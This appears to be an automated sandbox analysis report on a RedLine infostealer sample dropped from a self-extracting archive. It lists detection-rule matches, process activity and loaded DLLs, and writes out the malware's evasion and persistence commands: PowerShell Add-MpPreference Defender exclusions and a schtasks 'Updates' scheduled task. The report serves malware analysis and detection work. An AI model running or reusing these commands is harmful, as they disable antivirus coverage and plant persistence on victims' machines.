Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_07A50DB8	7_2_07A50DB8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_07A50DC8	7_2_07A50DC8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_07A502B8	7_2_07A502B8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_07A51200	7_2_07A51200
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_07A53270	7_2_07A53270
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_07A511F0	7_2_07A511F0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 14_2_02FBE7B0	14_2_02FBE7B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 14_2_02FBDC90	14_2_02FBDC90
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 14_2_06979630	14_2_06979630
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 14_2_06974468	14_2_06974468
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 14_2_06973311	14_2_06973311
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 14_2_06971300	14_2_06971300
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 14_2_0697DD18	14_2_0697DD18
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 14_2_0697DA24	14_2_0697DA24
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 14_2_0697D528	14_2_0697D528
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 14_2_069712FB	14_2_069712FB
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_05460040	16_2_05460040
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_054609F0	16_2_054609F0
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_05460A00	16_2_05460A00
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_07AA8278	16_2_07AA8278
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_07AA1628	16_2_07AA1628
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_07AA1638	16_2_07AA1638
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_07AA2E38	16_2_07AA2E38
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_07AA0DB8	16_2_07AA0DB8
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_07AA0DC8	16_2_07AA0DC8
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_07AA02B8	16_2_07AA02B8
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_07AA1200	16_2_07AA1200
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_07AA3270	16_2_07AA3270
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_07AA11F0	16_2_07AA11F0
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_08D42C18	16_2_08D42C18
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_08D44FE8	16_2_08D44FE8
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_08D4540F	16_2_08D4540F
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_08D42C09	16_2_08D42C09
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_08D49DF0	16_2_08D49DF0
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_08D49DE0	16_2_08D49DE0
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_08D44FD8	16_2_08D44FD8
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_08D4539C	16_2_08D4539C
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_08D45387	16_2_08D45387
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_08D496D0	16_2_08D496D0
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 21_2_010DE7B0	21_2_010DE7B0
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 21_2_010DDC90	21_2_010DDC90
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 21_2_06789630	21_2_06789630
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 21_2_06784468	21_2_06784468
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 21_2_0678D528	21_2_0678D528
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 21_2_06781210	21_2_06781210
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 21_2_06783320	21_2_06783320
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 21_2_0678DA30	21_2_0678DA30
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 21_2_0678C418	21_2_0678C418

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

Code function: String function: 0018C468 appears 55 times

Source: w4XFffGDz1.exe, 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenameRzhrA.exe8 vs w4XFffGDz1.exe

Source: w4XFffGDz1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 7.2.PO.exe.3c18d70.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 7.2.PO.exe.3c18d70.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.PO.exe.3c00f50.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 7.2.PO.exe.3c00f50.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 14.2.PO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 14.2.PO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.PO.exe.3c18d70.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 7.2.PO.exe.3c18d70.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.PO.exe.3c00f50.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 7.2.PO.exe.3c00f50.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: PO.exe PID: 7532, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: PO.exe PID: 8068, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: AJzHYZtQIb.exe PID: 8164, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23

Source: PO.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: AJzHYZtQIb.exe.7.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 7.2.PO.exe.79d0000.8.raw.unpack, hWGYb7gUweomxbkY6U.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, hWGYb7gUweomxbkY6U.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, EjNspf9tdXyKYSqTEN.cs	Security API names: _0020.SetAccessControl
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, EjNspf9tdXyKYSqTEN.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, EjNspf9tdXyKYSqTEN.cs	Security API names: _0020.AddAccessRule
Source: 7.2.PO.exe.79d0000.8.raw.unpack, EjNspf9tdXyKYSqTEN.cs	Security API names: _0020.SetAccessControl
Source: 7.2.PO.exe.79d0000.8.raw.unpack, EjNspf9tdXyKYSqTEN.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.PO.exe.79d0000.8.raw.unpack, EjNspf9tdXyKYSqTEN.cs	Security API names: _0020.AddAccessRule

Source: 7.2.PO.exe.2a3bdf8.2.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 7.2.PO.exe.7180000.6.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 7.2.PO.exe.2a2bde0.1.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@22/104@2/1

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

Code function: 0_2_00172E6F GetLastError,FormatMessageW,_wcslen,LocalFree,

0_2_00172E6F

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

Code function: 0_2_00185C5C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00185C5C

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

File created: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Mutant created: \Sessions\1\BaseNamedObjects\KEzgwTXVdrBxFOg
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

File created: C:\Users\user\AppData\Local\Temp\RarSFX0

Jump to behavior

Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Command line argument: sfxname	0_2_0018B2FE
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Command line argument: sfxstime	0_2_0018B2FE
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Command line argument: STARTDLG	0_2_0018B2FE

Source: w4XFffGDz1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: PO.exe, 0000000E.00000002.2291165421.0000000006913000.00000004.00000020.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2293576595.0000000007161000.00000004.00000020.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2376563773.0000000006F77000.00000004.00000020.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000003362000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, tmp7F89.tmp.21.dr, tmpA0BE.tmp.21.dr, tmpCE16.tmp.14.dr, tmp2BB9.tmp.14.dr, tmpCDF5.tmp.14.dr, tmp2BA8.tmp.14.dr, tmp2BDA.tmp.14.dr, tmp2BD9.tmp.14.dr, tmpD8D8.tmp.21.dr, tmpA0AE.tmp.21.dr, tmpCE06.tmp.14.dr, tmpCE38.tmp.14.dr, tmp7F58.tmp.21.dr, tmp7F78.tmp.21.dr, tmpD909.tmp.21.dr, tmpCE27.tmp.14.dr, tmpD8D7.tmp.21.dr, tmp2BFA.tmp.14.dr, tmp621E.tmp.14.dr, tmp7F8A.tmp.21.dr, tmpB5DE.tmp.21.dr, tmpCE48.tmp.14.dr, tmp7F9B.tmp.21.dr, tmpD8F8.tmp.21.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: w4XFffGDz1.exe	ReversingLabs: Detection: 68%
Source: w4XFffGDz1.exe	Virustotal: Detection: 67%

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

File read: C:\Users\user\Desktop\w4XFffGDz1.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\w4XFffGDz1.exe "C:\Users\user\Desktop\w4XFffGDz1.exe"
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp8574.tmp"
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process created: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp8574.tmp"
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process created: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"

Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
